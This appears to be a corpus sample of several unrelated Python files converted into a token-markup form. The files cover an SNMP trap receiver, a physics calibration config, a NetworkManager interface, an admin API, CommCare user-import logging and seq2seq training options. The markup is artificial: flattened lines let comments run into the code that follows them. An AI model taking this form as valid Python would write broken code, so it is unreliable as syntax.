%s'%(pMod.apiTrapPDU.getTimeStamp(reqPDU).prettyPrint()))<line_sep>varBinds=pMod.apiTrapPDU.getVarBindList(reqPDU)<block_end><else_stmt><block_start>varBinds=pMod.apiPDU.getVarBindList(reqPDU)<block_end>logger.debug('Var-binds:')<for_stmt>oid,val varBinds<block_start>logger.debug('%s = %s'%(oid.prettyPrint() val.prettyPrint()))<block_end><block_end><block_end><block_end># start the 2-stage configuration in a separate thread <if_stmt>trapReceiver<is><not><none># execute 2-stage configuration callback if there is one configured in openclos.yaml <block_start>callback=trapReceiver.twoStageConfigurationCallback<if_stmt>callback<is><not><none><and>len(callback)<g>0<block_start>proc=subprocess.Popen(callback shell=<true>)<line_sep>returnValue=proc.wait()<if_stmt>returnValue<ne>0# 2-stage configuration callback returns non-zero value indicating we SHOULD NOT continue <block_start>logger.debug('twoStageConfigurationCallback "%s" returns %d, trap ignored'%(callback returnValue))<line_sep><return><block_end><block_end>configurator=TwoStageConfigurator(deviceIp=transportAddress[0] stopEvent=trapReceiver.stopEvent)<line_sep>trapReceiver.executor.submit(configurator.start2StageConfiguration)<block_end><block_end><class_stmt>TrapReceiver()<block_start><def_stmt>__init__ self conf={}<block_start><if_stmt>conf<is><none><or>any(conf)<eq><false><block_start>self.__conf=OpenClosProperty(appName=moduleName).getProperties()<block_end><else_stmt><block_start>self.__conf=conf<block_end># default value 
self.target=DEFAULT_HOST<line_sep>self.port=DEFAULT_PORT<line_sep># validate required parameter <if_stmt>'snmpTrap'<in>self.__conf<and>'openclos_trap_group'<in>self.__conf['snmpTrap']<and>'target'<in>self.__conf['snmpTrap']['openclos_trap_group']<block_start>self.target=self.__conf['snmpTrap']['openclos_trap_group']['target']<block_end><else_stmt><block_start>logger.info("snmpTrap:openclos_trap_group:target is missing from configuration. using %s"%(self.target))<block_end><if_stmt>'snmpTrap'<in>self.__conf<and>'openclos_trap_group'<in>self.__conf['snmpTrap']<and>'port'<in>self.__conf['snmpTrap']['openclos_trap_group']<block_start>self.port=int(self.__conf['snmpTrap']['openclos_trap_group']['port'])<block_end><else_stmt><block_start>logger.info("snmpTrap:openclos_trap_group:port is missing from configuration. using %d"%(self.port))<block_end><if_stmt>'snmpTrap'<in>self.__conf<and>'threadCount'<in>self.__conf['snmpTrap']<block_start>self.executor=concurrent.futures.ThreadPoolExecutor(max_workers=self.__conf['snmpTrap']['threadCount'])<block_end><else_stmt><block_start>self.executor=concurrent.futures.ThreadPoolExecutor(max_workers=DEFAULT_MAX_THREADS)<block_end># event to stop from sleep self.stopEvent=Event()<line_sep>self.twoStageConfigurationCallback=util.getTwoStageConfigurationCallback(self.__conf)<block_end><def_stmt>threadFunction self<block_start>self.transportDispatcher=AsynsockDispatcher()<line_sep>self.transportDispatcher.registerRecvCbFun(onTrap)<line_sep># UDP/IPv4 self.transportDispatcher.registerTransport(udp.domainName udp.UdpSocketTransport().openServerMode((self.target self.port)))<line_sep>self.transportDispatcher.jobStarted(1)<try_stmt># Dispatcher will never finish as job#1 never reaches zero <block_start>self.transportDispatcher.runDispatcher()<block_end><except_stmt>Exception<as>exc<block_start>logger.error("Encounted error '%s' on trap receiver %s:%d"%(exc self.target self.port))<line_sep>self.transportDispatcher.closeDispatcher()<line_sep><raise>TrapDaemonError("Trap receiver %s:%d"%(self.target self.port) exc)<block_end><else_stmt><block_start>self.transportDispatcher.closeDispatcher()<block_end><block_end><def_stmt>start self<block_start>logger.info("Starting trap receiver...")<line_sep>self.thread=Thread(target=self.threadFunction args=())<line_sep>self.thread.start()<line_sep>logger.info("Trap receiver started on %s:%d"%(self.target self.port))<block_end><def_stmt>stop self<block_start>logger.info("Stopping trap receiver...")<line_sep>self.stopEvent.set()<line_sep>self.executor.shutdown()<line_sep>self.transportDispatcher.jobFinished(1)<line_sep>self.thread.join()<line_sep>logger.info("Trap receiver stopped")<block_end><block_end><def_stmt>trap_receiver_signal_handler signal frame<block_start>logger.debug("received signal %d"%signal)<line_sep>trapReceiver.stop()<line_sep>sys.exit(0)<block_end><def_stmt>main <block_start>signal.signal(signal.SIGINT trap_receiver_signal_handler)<line_sep>signal.signal(signal.SIGTERM trap_receiver_signal_handler)<line_sep><global>trapReceiver<line_sep>trapReceiver=TrapReceiver()<line_sep>trapReceiver.start()<line_sep># Note we have to do this in order for signal to be properly caught by main thread # We need to do the similar thing when we integrate this into sampleApplication.py <while_stmt><true><block_start>signal.pause()<block_end><block_end><if_stmt>__name__<eq>'__main__'<block_start>main()<block_end>
<import_stmt>FWCore.ParameterSet.Config<as>cms<line_sep>process=cms.Process('test')<line_sep># minimum logging process.MessageLogger=cms.Service("MessageLogger" cerr=cms.untracked.PSet(enable=cms.untracked.bool(<false>)) cout=cms.untracked.PSet(enable=cms.untracked.bool(<true>) threshold=cms.untracked.string('INFO')))<line_sep>process.source=cms.Source('EmptyIOVSource' timetype=cms.string('runnumber') firstValue=cms.uint64(1) lastValue=cms.uint64(1) interval=cms.uint64(1))<line_sep># load calibrations from database process.load('CondCore.CondDB.CondDB_cfi')<line_sep>process.CondDB.connect='sqlite_file:ppsDiamondTiming_calibration.sqlite'# SQLite input process.PoolDBESSource=cms.ESSource('PoolDBESSource' process.CondDB DumpStats=cms.untracked.bool(<true>) toGet=cms.VPSet(cms.PSet(record=cms.string('PPSTimingCalibrationRcd') tag=cms.string('PPSDiamondTimingCalibration'))))<line_sep>process.ppsTimingCalibrationAnalyzer=cms.EDAnalyzer('PPSTimingCalibrationAnalyzer')<line_sep>process.path=cms.Path(process.ppsTimingCalibrationAnalyzer)<line_sep>
"""NetworkInterface object for Network Manager."""<import_from_stmt>typing Optional<import_from_stmt>...utils.dbus DBus<import_from_stmt>..const DBUS_ATTR_ACTIVE_CONNECTION DBUS_ATTR_DEVICE_INTERFACE DBUS_ATTR_DEVICE_TYPE DBUS_ATTR_DRIVER DBUS_ATTR_MANAGED DBUS_IFACE_DEVICE DBUS_NAME_NM DBUS_OBJECT_BASE DeviceType <import_from_stmt>..interface DBusInterfaceProxy<import_from_stmt>.connection NetworkConnection<import_from_stmt>.setting NetworkSetting<import_from_stmt>.wireless NetworkWireless<class_stmt>NetworkInterface(DBusInterfaceProxy)<block_start>"""NetworkInterface object represents Network Manager Device objects. https://developer.gnome.org/NetworkManager/stable/gdbus-org.freedesktop.NetworkManager.Device.html """<def_stmt>__init__ self nm_dbus:DBus object_path:str<arrow><none><block_start>"""Initialize NetworkConnection object."""<line_sep>self.object_path=object_path<line_sep>self.properties={}<line_sep>self.primary=<false><line_sep>self._connection:Optional[NetworkConnection]=<none><line_sep>self._settings:Optional[NetworkSetting]=<none><line_sep>self._wireless:Optional[NetworkWireless]=<none><line_sep>self._nm_dbus:DBus=nm_dbus<block_end>@property<def_stmt>name self<arrow>str<block_start>"""Return interface name."""<line_sep><return>self.properties[DBUS_ATTR_DEVICE_INTERFACE]<block_end>@property<def_stmt>type self<arrow>int<block_start>"""Return interface type."""<line_sep><return>self.properties[DBUS_ATTR_DEVICE_TYPE]<block_end>@property<def_stmt>driver self<arrow>str<block_start>"""Return interface driver."""<line_sep><return>self.properties[DBUS_ATTR_DRIVER]<block_end>@property<def_stmt>managed self<arrow>bool<block_start>"""Return interface driver."""<line_sep><return>self.properties[DBUS_ATTR_MANAGED]<block_end>@property<def_stmt>connection self<arrow>Optional[NetworkConnection]<block_start>"""Return the connection used for this interface."""<line_sep><return>self._connection<block_end>@property<def_stmt>settings self<arrow>Optional[NetworkSetting]<block_start>"""Return the connection settings used for this interface."""<line_sep><return>self._settings<block_end>@property<def_stmt>wireless self<arrow>Optional[NetworkWireless]<block_start>"""Return the wireless data for this interface."""<line_sep><return>self._wireless<block_end><async_keyword><def_stmt>connect self<arrow><none><block_start>"""Get device information."""<line_sep>self.dbus=<await>DBus.connect(DBUS_NAME_NM self.object_path)<line_sep>self.properties=<await>self.dbus.get_properties(DBUS_IFACE_DEVICE)<line_sep># Abort if device is not managed <if_stmt><not>self.managed<block_start><return><block_end># If active connection exists <if_stmt>self.properties[DBUS_ATTR_ACTIVE_CONNECTION]<ne>DBUS_OBJECT_BASE<block_start>self._connection=NetworkConnection(self.properties[DBUS_ATTR_ACTIVE_CONNECTION])<line_sep><await>self._connection.connect()<block_end># Attach settings <if_stmt>self.connection<and>self.connection.setting_object<ne>DBUS_OBJECT_BASE<block_start>self._settings=NetworkSetting(self.connection.setting_object)<line_sep><await>self._settings.connect()<block_end># Wireless <if_stmt>self.type<eq>DeviceType.WIRELESS<block_start>self._wireless=NetworkWireless(self.object_path)<line_sep><await>self._wireless.connect()<block_end><block_end><block_end>
# -*- coding: utf-8 -*- <import_from_stmt>brewtils.errors ModelValidationError<import_from_stmt>brewtils.models Operation<import_from_stmt>brewtils.schema_parser SchemaParser<import_from_stmt>beer_garden.api.http.base_handler BaseHandler<class_stmt>AdminAPI(BaseHandler)<block_start><async_keyword><def_stmt>patch self<block_start>""" --- summary: Initiate administrative actions description: | The body of the request needs to contain a set of instructions detailing the operations to perform. Currently the supported operations are `rescan`: ```JSON [ { "operation": "rescan" } ] ``` * Will remove from the registry and database any currently stopped plugins whose directory has been removed. * Will add and start any new plugin directories. And reloading the plugin logging configuration: ```JSON [ { "operation": "reload", "path": "/config/logging/plugin" } ] ``` parameters: - name: patch in: body required: true description: Instructions for operations schema: $ref: '#/definitions/Patch' responses: 204: description: Operation successfully initiated 50x: $ref: '#/definitions/50xError' tags: - Admin """<line_sep>operations=SchemaParser.parse_patch(self.request.decoded_body many=<true> from_string=<true>)<for_stmt>op operations<block_start><if_stmt>op.operation<eq>"rescan"<block_start><await>self.client(Operation(operation_type="RUNNER_RESCAN"))<block_end><elif_stmt>op.operation<eq>"reload"<block_start><if_stmt>op.path<eq>"/config/logging/plugin"<block_start><await>self.client(Operation(operation_type="PLUGIN_LOG_RELOAD"))<block_end><else_stmt><block_start><raise>ModelValidationError(f"Unsupported path '{op.path}'")<block_end><block_end><else_stmt><block_start><raise>ModelValidationError(f"Unsupported operation '{op.operation}'")<block_end><block_end>self.set_status(204)<block_end><block_end>
<import_from_stmt>dimagi.utils.parsing string_to_boolean<import_from_stmt>corehq.apps.custom_data_fields.models PROFILE_SLUG<import_from_stmt>corehq.apps.user_importer.exceptions UserUploadError<import_from_stmt>corehq.apps.users.audit.change_messages UserChangeMessage<import_from_stmt>corehq.apps.users.model_log UserModelAction<import_from_stmt>corehq.apps.users.util log_user_change<def_stmt>spec_value_to_boolean_or_none user_spec_dict key<block_start>value=user_spec_dict.get(key <none>)<if_stmt>value<and>isinstance(value str)<block_start><return>string_to_boolean(value)<block_end><elif_stmt>isinstance(value bool)<block_start><return>value<block_end><else_stmt><block_start><return><none><block_end><block_end><class_stmt>UserChangeLogger(object)<block_start>""" User change logger to record - changes to user properties - text messages for changes - useful info for changes to associated data models like role/locations """<def_stmt>__init__ self upload_domain user_domain user is_new_user changed_by_user changed_via upload_record_id user_domain_required_for_log=<true><block_start>self.upload_domain=upload_domain<line_sep>self.user_domain=user_domain<line_sep>self.user=user<line_sep>self.is_new_user=is_new_user<line_sep>self.changed_by_user=changed_by_user<line_sep>self.changed_via=changed_via<line_sep>self.upload_record_id=upload_record_id<line_sep>self.user_domain_required_for_log=user_domain_required_for_log<if_stmt><not>is_new_user<block_start>self.original_user_doc=self.user.to_json()<block_end><else_stmt><block_start>self.original_user_doc=<none><block_end>self.fields_changed={}<line_sep>self.change_messages={}<line_sep>self._save=<false><block_end># flag to check if log needs to be saved for updates <def_stmt>add_changes self changes<block_start>""" Add changes to user properties. 
Ignored for new user since the whole user doc is logged for a new user :param changes: dict of property mapped to it's new value """<if_stmt>self.is_new_user<block_start><return><block_end><for_stmt>name,new_value changes.items()<block_start><if_stmt>self.original_user_doc[name]<ne>new_value<block_start>self.fields_changed[name]=new_value<line_sep>self._save=<true><block_end><block_end><block_end><def_stmt>add_change_message self message<block_start>""" Add change message for a change in user property that is in form of a UserChangeMessage Ignored for new user since the whole user doc is logged for a new user :param message: text message for the change like 'Password reset' / 'Added as web user to domain foo' """<if_stmt>self.is_new_user<block_start><return><block_end>self._update_change_messages(message)<line_sep>self._save=<true><block_end><def_stmt>_update_change_messages self change_messages<block_start><for_stmt>slug change_messages<block_start><if_stmt>slug<in>self.change_messages<block_start><raise>UserUploadError(f"Double Entry for {slug}")<block_end><block_end>self.change_messages.update(change_messages)<block_end><def_stmt>add_info self change_message<block_start>""" Add change message for a change to the user that is in form of a UserChangeMessage """<line_sep>self._update_change_messages(change_message)<line_sep>self._save=<true><block_end><def_stmt>save self<block_start><if_stmt>self.is_new_user<or>self._save<block_start>action=UserModelAction.CREATE<if>self.is_new_user<else>UserModelAction.UPDATE<line_sep>fields_changed=<none><if>self.is_new_user<else>self.fields_changed<line_sep>log_user_change(by_domain=self.upload_domain for_domain=self.user_domain couch_user=self.user changed_by_user=self.changed_by_user changed_via=self.changed_via change_messages=self.change_messages action=action fields_changed=fields_changed bulk_upload_record_id=self.upload_record_id for_domain_required_for_log=self.user_domain_required_for_log )<block_end><block_end><block_end><class_stmt>BaseUserImporter(object)<block_start>""" Imports a Web/CommCareUser via bulk importer and also handles the logging save_log should be called explicitly to save logs, after user is saved """<def_stmt>__init__ self upload_domain user_domain user upload_user is_new_user via upload_record_id<block_start>""" :param upload_domain: domain on which the bulk upload is being done :param user_domain: domain user is being updated for :param user: user to update :param upload_user: user doing the upload :param is_new_user: if user is a new user :param via: USER_CHANGE_VIA_BULK_IMPORTER :param upload_record_id: ID of the bulk upload record """<line_sep>self.user_domain=user_domain<line_sep>self.user=user<line_sep>self.upload_user=upload_user<line_sep>self.logger=UserChangeLogger(upload_domain=upload_domain user_domain=user_domain user=user is_new_user=is_new_user changed_by_user=upload_user changed_via=via upload_record_id=upload_record_id)<line_sep>self.role_updated=<false><block_end><def_stmt>update_role self role_qualified_id<block_start>user_current_role=self.user.get_role(domain=self.user_domain)<line_sep>self.role_updated=<not>(user_current_role<and>user_current_role.get_qualified_id()<eq>role_qualified_id)<if_stmt>self.role_updated<block_start>self.user.set_role(self.user_domain role_qualified_id)<block_end><block_end><def_stmt>save_log self# Tracking for role is done post save to have role setup correctly on save 
<block_start><if_stmt>self.role_updated<block_start>new_role=self.user.get_role(domain=self.user_domain)<line_sep>self.logger.add_info(UserChangeMessage.role_change(new_role))<block_end>self._include_user_data_changes()<line_sep>self.logger.save()<block_end><def_stmt>_include_user_data_changes self# ToDo: consider putting just the diff <block_start><if_stmt>self.logger.original_user_doc<and>self.logger.original_user_doc['user_data']<ne>self.user.user_data<block_start>self.logger.add_changes({'user_data':self.user.user_data})<block_end><block_end><block_end><class_stmt>CommCareUserImporter(BaseUserImporter)<block_start><def_stmt>update_password self password<block_start>self.user.set_password(password)<line_sep>self.logger.add_change_message(UserChangeMessage.password_reset())<block_end><def_stmt>update_phone_numbers self phone_numbers<block_start>""" The first item in 'phone_numbers' will be the default """<line_sep>old_user_phone_numbers=self.user.phone_numbers<line_sep>fmt_phone_numbers=[_fmt_phone(n)<for>n phone_numbers]<if_stmt>any(fmt_phone_numbers)<block_start>self.user.set_phone_numbers(fmt_phone_numbers default_number=fmt_phone_numbers[0])<block_end><else_stmt><block_start>self.user.set_phone_numbers([])<block_end>self._log_phone_number_changes(old_user_phone_numbers fmt_phone_numbers)<block_end><def_stmt>update_name self name<block_start>self.user.set_full_name(str(name))<line_sep>self.logger.add_changes({'first_name':self.user.first_name 'last_name':self.user.last_name})<block_end><def_stmt>update_user_data self data uncategorized_data profile domain_info# Add in existing data. Don't use metadata - we don't want to add profile-controlled fields. <block_start>current_profile_id=self.user.user_data.get(PROFILE_SLUG)<for_stmt>key,value self.user.user_data.items()<block_start><if_stmt>key<not><in>data<block_start>data[key]=value<block_end><block_end><if_stmt>profile<block_start>profile_obj=domain_info.profiles_by_name[profile]<line_sep>data[PROFILE_SLUG]=profile_obj.id<for_stmt>key profile_obj.fields.keys()<block_start>self.user.pop_metadata(key)<block_end><block_end><try_stmt><block_start>self.user.update_metadata(data)<block_end><except_stmt>ValueError<as>e<block_start><raise>UserUploadError(str(e))<block_end><if_stmt>uncategorized_data<block_start>self.user.update_metadata(uncategorized_data)<block_end># Clear blank user data so that it can be purged by remove_unused_custom_fields_from_users_task <for_stmt>key dict(data **uncategorized_data)<block_start>value=self.user.metadata[key]<if_stmt>value<is><none><or>value<eq>''<block_start>self.user.pop_metadata(key)<block_end><block_end>new_profile_id=self.user.user_data.get(PROFILE_SLUG)<if_stmt>new_profile_id<and>new_profile_id<ne>current_profile_id<block_start>profile_name=domain_info.profile_name_by_id[new_profile_id]<line_sep>self.logger.add_info(UserChangeMessage.profile_info(new_profile_id profile_name))<block_end><block_end><def_stmt>update_language self language<block_start>self.user.language=language<line_sep>self.logger.add_changes({'language':language})<block_end><def_stmt>update_email self email<block_start>self.user.email=email.lower()<line_sep>self.logger.add_changes({'email':self.user.email})<block_end><def_stmt>update_status self is_active<block_start>self.user.is_active=is_active<line_sep>self.logger.add_changes({'is_active':is_active})<block_end><def_stmt>update_locations self location_codes domain_info<block_start><import_from_stmt>corehq.apps.user_importer.importer check_modified_user_loc find_location_id 
get_location_from_site_code <line_sep>location_ids=find_location_id(location_codes domain_info.location_cache)<line_sep>user_current_primary_location_id=self.user.location_id<line_sep>locations_updated,primary_loc_removed=check_modified_user_loc(location_ids self.user.location_id self.user.assigned_location_ids)<if_stmt>primary_loc_removed<block_start>self.user.unset_location(commit=<false>)<block_end><if_stmt>locations_updated<block_start>self.user.reset_locations(location_ids commit=<false>)<line_sep>self.logger.add_changes({'assigned_location_ids':location_ids})<if_stmt>location_ids<block_start>locations=[get_location_from_site_code(code domain_info.location_cache)<for>code location_codes]<line_sep>self.logger.add_info(UserChangeMessage.assigned_locations_info(locations))<block_end><else_stmt><block_start>self.logger.add_info(UserChangeMessage.assigned_locations_info([]))<block_end><block_end># log this after assigned locations are updated, which can re-set primary location <if_stmt>self.user.location_id<ne>user_current_primary_location_id<block_start>self.logger.add_changes({'location_id':self.user.location_id})<if_stmt>self.user.location_id<block_start>self.logger.add_info(UserChangeMessage.primary_location_info(self.user.get_sql_location(self.user_domain)))<block_end><else_stmt><block_start>self.logger.add_info(UserChangeMessage.primary_location_removed())<block_end><block_end><block_end><def_stmt>_log_phone_number_changes self old_phone_numbers new_phone_numbers<block_start>(items_added items_removed)=find_differences_in_list(target=new_phone_numbers source=old_phone_numbers)<line_sep>change_messages={}<if_stmt>items_added<block_start>change_messages.update(UserChangeMessage.phone_numbers_added(list(items_added))["phone_numbers"])<block_end><if_stmt>items_removed<block_start>change_messages.update(UserChangeMessage.phone_numbers_removed(list(items_removed))["phone_numbers"])<block_end><if_stmt>change_messages<block_start>self.logger.add_change_message({'phone_numbers':change_messages})<block_end><block_end><block_end><def_stmt>_fmt_phone phone_number<block_start><if_stmt>phone_number<and><not>isinstance(phone_number str)<block_start>phone_number=str(int(phone_number))<block_end><return>phone_number.lstrip("+")<block_end><class_stmt>WebUserImporter(BaseUserImporter)<block_start><def_stmt>add_to_domain self role_qualified_id location_id<block_start>self.user.add_as_web_user(self.user_domain role=role_qualified_id location_id=location_id)<line_sep>self.role_updated=bool(role_qualified_id)<line_sep>self.logger.add_info(UserChangeMessage.added_as_web_user(self.user_domain))<if_stmt>location_id<block_start>self._log_primary_location_info()<block_end><block_end><def_stmt>_log_primary_location_info self<block_start>primary_location=self.user.get_sql_location(self.user_domain)<line_sep>self.logger.add_info(UserChangeMessage.primary_location_info(primary_location))<block_end><def_stmt>update_primary_location self location_id<block_start>current_primary_location_id=get_user_primary_location_id(self.user self.user_domain)<if_stmt>location_id<block_start>self.user.set_location(self.user_domain location_id)<if_stmt>current_primary_location_id<ne>location_id<block_start>self._log_primary_location_info()<block_end><block_end><else_stmt><block_start>self.user.unset_location(self.user_domain)<line_sep># if there was a location before, log that it was cleared 
<if_stmt>current_primary_location_id<block_start>self.logger.add_info(UserChangeMessage.primary_location_removed())<block_end><block_end><block_end><def_stmt>update_locations self location_codes membership domain_info<block_start><import_from_stmt>corehq.apps.user_importer.importer check_modified_user_loc find_location_id get_location_from_site_code <line_sep>location_ids=find_location_id(location_codes domain_info.location_cache)<line_sep>user_current_primary_location_id=membership.location_id<line_sep>locations_updated,primary_loc_removed=check_modified_user_loc(location_ids membership.location_id membership.assigned_location_ids)<if_stmt>primary_loc_removed<block_start>self.user.unset_location(self.user_domain commit=<false>)<block_end><if_stmt>locations_updated<block_start>self.user.reset_locations(self.user_domain location_ids commit=<false>)<if_stmt>location_ids<block_start>locations=[get_location_from_site_code(code domain_info.location_cache)<for>code location_codes]<block_end><else_stmt><block_start>locations=[]<block_end>self.logger.add_info(UserChangeMessage.assigned_locations_info(locations))<block_end># log this after assigned locations are updated, which can re-set primary location user_updated_primary_location_id=get_user_primary_location_id(self.user self.user_domain)<if_stmt>user_updated_primary_location_id<ne>user_current_primary_location_id<block_start><if_stmt>user_updated_primary_location_id<block_start>self._log_primary_location_info()<block_end><else_stmt><block_start>self.logger.add_info(UserChangeMessage.primary_location_removed())<block_end><block_end><block_end><block_end><def_stmt>get_user_primary_location_id user domain<block_start>primary_location=user.get_sql_location(domain)<if_stmt>primary_location<block_start><return>primary_location.location_id<block_end><block_end><def_stmt>get_user_primary_location_name user domain<block_start>primary_location=user.get_sql_location(domain)<if_stmt>primary_location<block_start><return>primary_location.name<block_end><block_end><def_stmt>find_differences_in_list target:list source:list<block_start>""" Find the differences between 'source' and 'target' and return (added_items, removed_items) 'added_items': items that are in 'target' but not in 'source' 'removed_items': items that are in 'source' but not 'target' >>> find_differences_in_list(list_to_compare=[3,4,5,6], reference_list=[1,2,3,5]) ({4, 6}, {1, 2}) """<line_sep>shared_items=set(target).intersection(source)<line_sep>added_items=set(target).difference(shared_items)<line_sep>removed_items=set(source).difference(shared_items)<line_sep><return>added_items removed_items<block_end>
""" Implementation of all available options """<import_from_future_stmt> print_function<line_sep>"""Model architecture/optimization options for Seq2seq architecture."""<import_stmt>argparse<import_stmt>logging<line_sep>logger=logging.getLogger(__name__)<line_sep># Index of arguments concerning the core model architecture MODEL_ARCHITECTURE={'model_type' 'emsize' 'rnn_type' 'nhid' 'nlayers' 'use_all_enc_layers' 'bidirection' 'src_pos_emb' 'tgt_pos_emb' 'max_relative_pos' 'use_neg_dist' 'd_ff' 'd_k' 'd_v' 'num_head' 'trans_drop' 'n_characters' 'char_emsize' 'filter_size' 'nfilters'}<line_sep>SEQ2SEQ_ARCHITECTURE={'attn_type' 'coverage_attn' 'copy_attn' 'review_attn' 'force_copy' 'layer_wise_attn' 'split_decoder' 'reuse_copy_attn' 'reload_decoder_state' 'share_decoder_embeddings' 'conditional_decoding'}<line_sep>DATA_OPTIONS={'use_src_char' 'use_tgt_char' 'use_src_word' 'use_tgt_word' 'max_src_len' 'max_tgt_len' 'src_vocab_size' 'tgt_vocab_size' 'num_train_examples' 'batch_size' 'use_code_type' 'code_tag_type' 'uncase' 'max_characters_per_token' 'dataset_weights'}<line_sep># Index of arguments concerning the model optimizer/training MODEL_OPTIMIZER={'optimizer' 'fix_embeddings' 'learning_rate' 'momentum' 'weight_decay' 'rnn_padding' 'dropout_rnn' 'dropout' 'dropout_emb' 'cuda' 'grad_clipping' 'lr_decay' 'warmup_steps' 'num_epochs' 'parallel'}<def_stmt>str2bool v<block_start><return>v.lower()<in>('yes' 'true' 't' '1' 'y')<block_end><def_stmt>add_model_args parser<block_start>parser.register('type' 'bool' str2bool)<line_sep># Data options data=parser.add_argument_group('Data parameters')<line_sep>data.add_argument('--max_src_len' type=int default=100 help='Maximum allowed length for the source sequence')<line_sep>data.add_argument('--max_tgt_len' type=int default=50 help='Maximum allowed length for the target sequence')<line_sep>data.add_argument('--use_code_type' type='bool' default=<false> help='Use code type as additional feature for feature representations')<line_sep>data.add_argument('--code_tag_type' type=str default='subtoken' help='Use code type as additional feature for feature representations')<line_sep># Model architecture model=parser.add_argument_group('Summary Generator')<line_sep>model.add_argument('--model_type' type=str default='rnn' choices=['rnn' 'transformer'] help='Model architecture type')<line_sep>model.add_argument('--emsize' type=int default=300 help='Embedding size if embedding_file is not given')<line_sep>model.add_argument('--rnn_type' type=str default='LSTM' help='RNN type: LSTM, GRU')<line_sep>model.add_argument('--nhid' type=int default=200 help='Hidden size of RNN units')<line_sep>model.add_argument('--bidirection' type='bool' default=<true> help='use bidirectional recurrent unit')<line_sep>model.add_argument('--nlayers' type=int default=2 help='Number of encoding layers')<line_sep>model.add_argument('--use_all_enc_layers' type='bool' default=<false> help='Use a weighted average of all encoder layers\' '<concat>'representation as the contextual representation')<line_sep># Transformer specific params model.add_argument('--src_pos_emb' type='bool' default=<true> help='Use positional embeddings in encoder')<line_sep>model.add_argument('--tgt_pos_emb' type='bool' default=<true> help='Use positional embeddings in decoder')<line_sep>model.add_argument('--max_relative_pos' nargs='+' type=int default=0 help='Max value for relative position representations')<line_sep>model.add_argument('--use_neg_dist' type='bool' default=<true> help='Use negative Max value for relative 
position representations')<line_sep>model.add_argument('--d_ff' type=int default=2048 help='Number of units in position-wise FFNN')<line_sep>model.add_argument('--d_k' type=int default=64 help='Hidden size of heads in multi-head attention')<line_sep>model.add_argument('--d_v' type=int default=64 help='Hidden size of heads in multi-head attention')<line_sep>model.add_argument('--num_head' type=int default=8 help='Number of heads in Multi-Head Attention')<line_sep>model.add_argument('--trans_drop' type=float default=0.2 help='Dropout for transformer')<line_sep>model.add_argument('--layer_wise_attn' type='bool' default=<false> help='Use layer-wise attention in Transformer')<line_sep># Input representation specific details model.add_argument('--use_src_char' type='bool' default=<false> help='Use character embedding in the source')<line_sep>model.add_argument('--use_tgt_char' type='bool' default=<false> help='Use character embedding in the target')<line_sep>model.add_argument('--use_src_word' type='bool' default=<true> help='Use word embedding in the input')<line_sep>model.add_argument('--use_tgt_word' type='bool' default=<true> help='Use word embedding in the input')<line_sep>model.add_argument('--n_characters' type=int default=260 help='Character vocabulary size')<line_sep>model.add_argument('--char_emsize' type=int default=16 help='Character embedding size')<line_sep>model.add_argument('--filter_size' nargs='+' type=int default=5 help='Char convolution filter sizes')<line_sep>model.add_argument('--nfilters' nargs='+' type=int default=100 help='Number of char convolution filters')<line_sep>seq2seq=parser.add_argument_group('Seq2seq Model Specific Params')<line_sep>seq2seq.add_argument('--attn_type' type=str default='general' help='Attention type for the seq2seq [dot, general, mlp]')<line_sep>seq2seq.add_argument('--coverage_attn' type='bool' default=<false> help='Use coverage attention')<line_sep>seq2seq.add_argument('--copy_attn' type='bool' default=<false> help='Use copy attention')<line_sep>seq2seq.add_argument('--review_attn' type='bool' default=<false> help='Use review attention')<line_sep>seq2seq.add_argument('--force_copy' type='bool' default=<false> help='Apply force copying')<line_sep>seq2seq.add_argument('--reuse_copy_attn' type='bool' default=<false> help='Reuse encoder attention')<line_sep>seq2seq.add_argument('--share_decoder_embeddings' type='bool' default=<false> help='Share decoder embeddings weight with softmax layer')<line_sep>seq2seq.add_argument('--split_decoder' type='bool' default=<false> help='Split the decoder into two for copying and generation')<line_sep>seq2seq.add_argument('--reload_decoder_state' type=str default=<none> help='Reload decoder states for the seq2seq')<line_sep>seq2seq.add_argument('--conditional_decoding' type='bool' default=<false> help='Conditional decoding applied to Seq2seq')<line_sep># Optimization details optim=parser.add_argument_group('Neural QA Reader Optimization')<line_sep>optim.add_argument('--optimizer' type=str default='adam' choices=['sgd' 'adam' 'adamW'] help='Name of the optimizer')<line_sep>optim.add_argument('--dropout_emb' type=float default=0.2 help='Dropout rate for word embeddings')<line_sep>optim.add_argument('--dropout_rnn' type=float default=0.2 help='Dropout rate for RNN states')<line_sep>optim.add_argument('--dropout' type=float default=0.2 help='Dropout for NN layers')<line_sep>optim.add_argument('--learning_rate' type=float default=0.001 help='Learning rate for the optimizer')<line_sep>parser.add_argument('--lr_decay' 
type=float default=0.99 help='Decay ratio for learning rate')<line_sep>optim.add_argument('--grad_clipping' type=float default=5.0 help='Gradient clipping')<line_sep>parser.add_argument('--early_stop' type=int default=5 help='Stop training if performance doesn\'t improve')<line_sep>optim.add_argument('--weight_decay' type=float default=0 help='Weight decay factor')<line_sep>optim.add_argument('--momentum' type=float default=0 help='Momentum factor')<line_sep>optim.add_argument('--fix_embeddings' type='bool' default=<true> help='Keep word embeddings fixed (use pretrained)')<line_sep>optim.add_argument('--warmup_steps' type=int default=10000 help='Number of warmup steps')<line_sep>optim.add_argument('--warmup_epochs' type=int default=0 help='Number of warmup epochs')<block_end><def_stmt>get_model_args args<block_start>"""Filter args for model ones. From an args Namespace, return a new Namespace with *only* the args specific to the model architecture or optimization. (i.e. the ones defined here.) """<line_sep><global>MODEL_ARCHITECTURE MODEL_OPTIMIZER SEQ2SEQ_ARCHITECTURE DATA_OPTIONS<line_sep>required_args=MODEL_ARCHITECTURE|MODEL_OPTIMIZER|SEQ2SEQ_ARCHITECTURE|DATA_OPTIONS<line_sep>arg_values={k:v<for>k,v vars(args).items()<if>k<in>required_args}<line_sep><return>argparse.Namespace(**arg_values)<block_end><def_stmt>override_model_args old_args new_args<block_start>"""Set args to new parameters. Decide which model args to keep and which to override when resolving a set of saved args and new args. We keep the new optimization or RL setting, and leave the model architecture alone. """<line_sep><global>MODEL_OPTIMIZER<line_sep>old_args,new_args=vars(old_args) vars(new_args)<for_stmt>k old_args.keys()<block_start><if_stmt>k<in>new_args<and>old_args[k]<ne>new_args[k]<block_start><if_stmt>k<in>MODEL_OPTIMIZER<block_start>logger.info('Overriding saved %s: %s --> %s'%(k old_args[k] new_args[k]))<line_sep>old_args[k]=new_args[k]<block_end><else_stmt><block_start>logger.info('Keeping saved %s: %s'%(k old_args[k]))<block_end><block_end><block_end><return>argparse.Namespace(**old_args)<block_end><def_stmt>add_new_model_args old_args new_args<block_start>"""Set args to new parameters. 